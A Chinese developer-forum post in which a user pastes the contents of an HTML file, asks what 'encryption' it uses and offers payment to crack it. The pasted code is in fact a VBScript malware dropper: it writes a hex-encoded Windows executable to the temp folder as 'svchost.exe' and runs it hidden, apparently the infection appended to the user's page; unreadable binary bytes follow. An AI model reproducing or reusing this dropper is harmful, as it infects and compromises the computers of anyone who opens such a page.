Egret社区

请问下 这是 什么加密

2018-12-6 20:22
1810
怎么实现的  可以破解么  html  有偿 75991422
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C0103008ADB2DB30000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E004000000400000100000000200000500000007000200040000000000000000B00500001000000000000002000000000010000010000000001000001000000000000010000000000000000000000074580500E400000000E0040000D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000A00300001000000000000000020000000000000000000000000000800000E055505831000000000030010000B003000024010000020000000000000000000000000000400000E02E7273726300000000D0000000E004000080000000260100000000000000000000000000600000E0332E303300555058210D090208D2F70EDDDF35821
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--kñYßı„¨ÒÆfiƒöQÈ’]\sıó'GfiÁ5<jy¬7i”µ÷ÔÈJ£eŸÒN¯≠Á~Û=.tÏ∏b\ÃüiP3§/πÖÎ’~5æ¢rWadÙz«ÜE+2:ÇL1∏}~∆Y7mLéV∂ïÊ\“<Ö&ë–~–¥5qo§CŒ∞¯|ó=%÷ =5Íœq2§C.Kë
T.gå≈IRt*fìhº˛ôv{Ì‹ˆˆ√\Q~vÂßlÑ˘ã›ôÜ˚ÿszÆX¡©|+Ó(o        }–x¿,S“)⁄-±”◊}B»≈·D
ıRV,í‰aflç0yÑ«á¿qÅÅ%nløö”•d‰´÷÷Õ4∞ùÇ>∏◊‹®{®Íé^ŧ·N“h]<X
BUfÂBÂÚ!fiΩêÍ™Óphœ¿…íAcaµQ≥¡T5,˝–‰çn3ìúUú=”|∞J‘⁄Mπ{Ω?y°~e)eõëSP
œÀ-R6˘À-À-À-ÜOõ›-_


aside.html.zip

99.16 KB, 下载次数: 3, 下载积分: 银子 -1

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

djhaoyang

初学乍练

积分: 4 帖子: 4 精华: 0

楼主热帖

小黑屋|京网文[2014]0791-191号|京ICP证150115号|Egret社区 ( 京ICP备14025619号

Powered by Discuz! X3.2 © 2001-2019 Comsenz Inc.

返回顶部